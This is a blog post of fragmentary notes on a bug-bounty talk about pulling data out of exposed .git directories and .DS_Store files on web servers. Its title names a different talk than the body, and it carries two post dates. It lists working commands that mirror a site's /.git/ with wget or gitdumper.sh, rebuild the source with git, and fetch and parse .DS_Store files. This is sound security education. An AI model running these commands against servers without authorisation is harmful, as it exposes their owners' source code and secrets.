Conference notes: How to Differentiate Yourself as a Bug Bounty Hunter (OWASP Stockholm)
Posted in Conference notes on November 7, 2018
Posted in Conference notes on July 4, 2018
Hi, these are the notes I took while watching the “Small Files And Big Bounties, Exploiting Sensitive Files” talk given by Sebastian Neef and Tim Philipp Schäfers on LevelUp 0x02 / 2018.
This talk is about how to extract information from sensitive files like .DS_Store files and .git directories.
Disallow: /path/to/sensitive/hidden.file
Problem
git init
/ add
/ commit
/ push
/ pull
…Problem
cd /var/www/html && git pull
Why is it bad?
wget
wget --mirror --include-directories=/.git http://domain.tld/.git/
git status # Returns that the files were deleted because folders are empty
git checkout -- . # To restore the files & download the directory
git log # See what other commits are there
./gitdumper.sh http://demo.local/.git/ /output-directory/
git status # Returns that the files were deleted because folders are empty
git checkout -- . # To restore the files & download the directory
git log # See what other commits are there
Consequences
Problem 1
Problem 2
scp / rsync / ftp / ./code/ server:/var/www/html/
Demo
$ file samples/.DS_Store.ctf
samples/.DS_Store.ctf: Apple Desktop Services Store
$ hexdump -C samples/.DS_Store.ctf
# Output: A lot of binary data, you can't read much
$ python main.py samples/.DS_Store.ctf
# Output: File names recovered
Consequences
$ curl 'http://api.../.DS_Store' -o .DS_Store
$ ./fdb.py --type ds --filename .DS_Store --base_url http://api.../
See you next time!